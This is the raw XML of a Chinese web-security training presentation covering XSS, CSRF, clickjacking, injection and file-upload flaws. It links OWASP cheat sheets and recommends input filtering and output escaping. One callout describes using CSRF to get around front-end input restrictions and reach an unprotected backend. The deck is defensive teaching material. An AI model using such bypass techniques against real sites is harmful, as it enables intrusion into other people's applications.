              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>XSS Filter Evasion Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>》</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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928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、跨站脚本攻击（XSS）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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>实例一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340768"/>
            <a:ext cx="8568952" cy="352839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211960" y="1628800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95836" y="2540732"/>
            <a:ext cx="2700300" cy="1104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680" y="3887198"/>
            <a:ext cx="8136904" cy="29523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72605" y="5363362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8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、跨站脚本攻击（XSS）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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>二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36" y="1412776"/>
            <a:ext cx="5688632" cy="28803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699792" y="1395300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/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect r="5572" b="46360"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="602696" y="1843074"/>
            <a:ext cx="5697496" cy="187395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02696" y="2600869"/>
            <a:ext cx="1233000" cy="216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/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect r="37570" b="65940"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314450" y="3090328"/>
            <a:ext cx="3761606" cy="13467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/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect r="6020" b="38429"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2024329" y="3933056"/>
            <a:ext cx="5788031" cy="230425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419872" y="3655270"/>
            <a:ext cx="616500" cy="216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0945" y="2132856"/>
            <a:ext cx="1113383" cy="216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361652" y="5157192"/>
            <a:ext cx="150649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6774" y="5922029"/>
            <a:ext cx="616500" cy="216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4791698" y="1591483"/>
            <a:ext cx="3236685" cy="649822"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -59221"/>
              <a:gd name="adj2" fmla="val -43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虽然目前前端已经限制不能输入特殊字符（大于号、小于号）但是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>就可以绕过前端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，并验明后台没做安全处理。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3977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OGISTICS-T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-4763"/>
            <a:ext cx="7829550" cy="1057276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、跨站脚本攻击（XSS）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>1.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>防范</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>在Web应用中，XSS缺陷很难确认和移除，一些漏洞扫描工具也只能对浅层的扫描。最好的方式就是针对安全展开代码Review，并对所有来自HTTP请求的数据进行检查，输出时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>进行合理的转义。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zh-CN" altLang="en-US" sz="2000" dirty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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（1）对输入值进行严格的检查，过滤。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>         对特殊字符进行过滤；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>         输入富文本的地方尽量直接使用HTML语法，而用UBB等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty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如果确实需要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>，请使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>AntiSamy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> 进行危险代码过滤。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zh-CN" altLang="en-US" sz="2000" dirty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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（2）对输出值进行HTML转义、JavaScript转义，URL转义。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>具体请参考 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>、和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DOM based XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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734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theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="51ppt.com.cn_003">
  <a:themeElements>
    <a:clrScheme name="Office 主题 13">
      <a:dk1>
        <a:srgbClr val="061F5B"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="FFFFFF"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="808080"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="061F5B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="6E95C8"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="04194C"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="AAABB5"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="6387B5"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0074BF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="AED3EA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3">
        <a:dk1>
          <a:srgbClr val="061F5B"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="FFFFFF"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="808080"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="061F5B"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="6E95C8"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="04194C"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="AAABB5"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="6387B5"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="0074BF"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="AED3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51ppt.com.cn_003</Template>
  <TotalTime>1883</TotalTime>
  <Words>4063</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>316</Paragraphs>
  <Slides>42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51ppt.com.cn_003</vt:lpstr>
      <vt:lpstr>WEB安全</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>1、跨站脚本攻击（XSS）</vt:lpstr>
      <vt:lpstr>1、跨站脚本攻击（XSS）</vt:lpstr>
      <vt:lpstr>1、跨站脚本攻击（XSS）</vt:lpstr>
      <vt:lpstr>1、跨站脚本攻击（XSS）</vt:lpstr>
      <vt:lpstr>1、跨站脚本攻击（XSS）</vt:lpstr>
      <vt:lpstr>1、跨站脚本攻击（XSS）</vt:lpstr>
      <vt:lpstr>1、跨站脚本攻击（XSS）</vt:lpstr>
      <vt:lpstr>1、跨站脚本攻击（XSS）</vt:lpstr>
      <vt:lpstr>2、跨站点请求伪造（CSRF）</vt:lpstr>
      <vt:lpstr>2、跨站点请求伪造（CSRF）</vt:lpstr>
      <vt:lpstr>2、跨站点请求伪造（CSRF）</vt:lpstr>
      <vt:lpstr>2、跨站点请求伪造（CSRF）</vt:lpstr>
      <vt:lpstr>3、点击劫持（ClickJacking）</vt:lpstr>
      <vt:lpstr>3、点击劫持</vt:lpstr>
      <vt:lpstr>3、点击劫持</vt:lpstr>
      <vt:lpstr>5.注入攻击</vt:lpstr>
      <vt:lpstr>5.注入攻击</vt:lpstr>
      <vt:lpstr>5.注入攻击</vt:lpstr>
      <vt:lpstr>六、文件上传漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>设计安全的文件上传功能（防御）</vt:lpstr>
      <vt:lpstr>8、WEB框架安全</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>9、应用层拒绝服务攻击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防御</vt:lpstr>
      <vt:lpstr>10、PHP及WEB SERVER配置安全</vt:lpstr>
      <vt:lpstr>10、PHP及WEB SERVER配置安全</vt:lpstr>
      <vt:lpstr>10、PHP及WEB SERVER配置安全</vt:lpstr>
      <vt:lpstr>10、PHP及WEB SERVER配置安全</vt:lpstr>
      <vt:lpstr>10、PHP及WEB SERVER配置安全</vt:lpstr>
      <vt:lpstr>10、PHP及WEB SERVER配置安全</vt:lpstr>
      <vt:lpstr>11、WEB安全检测工具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chenjun</dc:creator>
  <cp:lastModifiedBy>吕星</cp:lastModifiedBy>
  <cp:revision>260</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-04-21T07:11:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-02-20T10:25:49Z</dcterms:modified>
</cp:coreProperties>
</file>